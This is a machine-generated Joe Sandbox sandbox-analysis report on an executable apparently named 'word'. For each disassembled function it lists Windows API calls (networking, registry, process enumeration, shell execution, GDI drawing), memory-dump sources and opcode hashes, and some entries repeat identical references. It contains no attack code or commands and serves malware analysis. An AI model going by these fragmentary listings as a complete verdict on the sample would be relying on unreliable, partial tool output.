                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            • Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                            • Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
                                                                            • Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                            • Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64
                                                                            Function 00464A0E Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WSAStartup.WSOCK32(00000101,?,?), ref: 00464ADE
                                                                              • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                            • inet_addr.WSOCK32(?,00000000,?,?,00000101,?,?), ref: 00464B1F
                                                                            • gethostbyname.WSOCK32(?,?,00000000,?,?,00000101,?,?), ref: 00464B29
                                                                            • _memset.LIBCMT ref: 00464B92
                                                                            • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                                                                            • WSACleanup.WSOCK32 ref: 00464CE4
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
                                                                            • String ID:
                                                                            • API String ID: 3424476444-0
                                                                            • Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                            • Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
                                                                            • Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                            • Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
                                                                            Function 0046AB70 Relevance: 10.8, APIs: 7, Instructions: 260registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ConnectRegistry_wcslen
                                                                            • String ID:
                                                                            • API String ID: 535477410-0
                                                                            • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                            • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                                                                            • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                            • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                                                                            Function 0047395A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00473C01
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                            • String ID: HH
                                                                            • API String ID: 3488606520-2761332787
                                                                            • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                            • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                                                                            • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                            • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
                                                                            Function 004472C8 Relevance: 10.7, APIs: 7, Instructions: 207COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                              • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00447195
                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                              • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                            • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                            • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                            • LineTo.GDI32(?,?), ref: 004474BF
                                                                            • CloseFigure.GDI32(?), ref: 004474C6
                                                                            • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                            • Rectangle.GDI32(?,?), ref: 004474F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                            • String ID:
                                                                            • API String ID: 4082120231-0
                                                                            • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                            • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                                                            • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                            • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                                                                            Function 00447303 Relevance: 10.7, APIs: 7, Instructions: 192COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                              • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00447195
                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                              • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                            • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                            • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                            • LineTo.GDI32(?,?), ref: 004474BF
                                                                            • CloseFigure.GDI32(?), ref: 004474C6
                                                                            • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                            • Rectangle.GDI32(?,?), ref: 004474F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                            • String ID:
                                                                            • API String ID: 4082120231-0
                                                                            • Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                            • Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
                                                                            • Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                            • Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
                                                                            Function 0044733D Relevance: 10.7, APIs: 7, Instructions: 177COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                                                                            • String ID:
                                                                            • API String ID: 288456094-0
                                                                            • Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                            • Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
                                                                            • Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                            • Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
                                                                            Function 0044496C Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                            • Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
                                                                            • Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                            • Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
                                                                            Function 00444B65 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                            • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                                                                            • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                            • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
                                                                            Function 0046A98D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 158registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ConnectRegistry_wcslen
                                                                            • String ID: HH
                                                                            • API String ID: 535477410-2761332787
                                                                            • Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                            • Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
                                                                            • Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                            • Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
                                                                            Function 00457C08 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00457C34
                                                                            • _memset.LIBCMT ref: 00457CE8
                                                                            • ShellExecuteExW.SHELL32(?), ref: 00457D34
                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                            • CloseHandle.KERNEL32(?), ref: 00457DDD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                                                                            • String ID: <$@
                                                                            • API String ID: 1325244542-1426351568
                                                                            • Opcode ID: 669f3797eafbd6ea24f738bceaf78c3ad3f6bdf3b3f8ec2a74c9f7251b65f49f
                                                                            • Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
                                                                            • Opcode Fuzzy Hash: 669f3797eafbd6ea24f738bceaf78c3ad3f6bdf3b3f8ec2a74c9f7251b65f49f
                                                                            • Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
                                                                            Function 0047375F Relevance: 10.6, APIs: 7, Instructions: 150processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0047379B
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                                                            • __wsplitpath.LIBCMT ref: 004737E1
                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                            • _wcscat.LIBCMT ref: 004737F6
                                                                            • __wcsicoll.LIBCMT ref: 00473818
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00473852
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                            • String ID:
                                                                            • API String ID: 2547909840-0
                                                                            • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                            • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
                                                                            • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                            • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                                                                            Function 00455297 Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                            • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                            • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                            • DestroyWindow.USER32 ref: 00455678
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                            • String ID:
                                                                            • API String ID: 2354583917-0
                                                                            • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                            • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                                                            • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                            • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                                                            Function 0047762A Relevance: 10.6, APIs: 7, Instructions: 140windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                            • GetMenu.USER32(?,?,?,00000001,?,?,?,?), ref: 004776AA
                                                                            • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                                                            • _wcslen.LIBCMT ref: 0047771A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$CountItemStringWindow_wcslen
                                                                            • String ID:
                                                                            • API String ID: 1823500076-0
                                                                            • Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                            • Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
                                                                            • Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                            • Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
                                                                            Function 0047244D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InterlockedIncrement.KERNEL32 ref: 0047247C
                                                                            • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                                                            • Sleep.KERNEL32(0000000A), ref: 00472499
                                                                            • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                                                            • InterlockedDecrement.KERNEL32(004A7CAC,?,?,?,?), ref: 00472599
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Interlocked$DecrementIncrement$Sleep
                                                                            • String ID: 0vH
                                                                            • API String ID: 327565842-3662162768
                                                                            • Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                            • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                                                                            • Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                            • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                                                                            Function 00448AFF Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                                                                            • GetFocus.USER32(?,00000401,?,00000000), ref: 00448B1C
                                                                            • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                            • ShowWindow.USER32(004A83D8,00000000), ref: 00448C37
                                                                            • ShowWindow.USER32(004A83D8,00000004), ref: 00448C43
                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
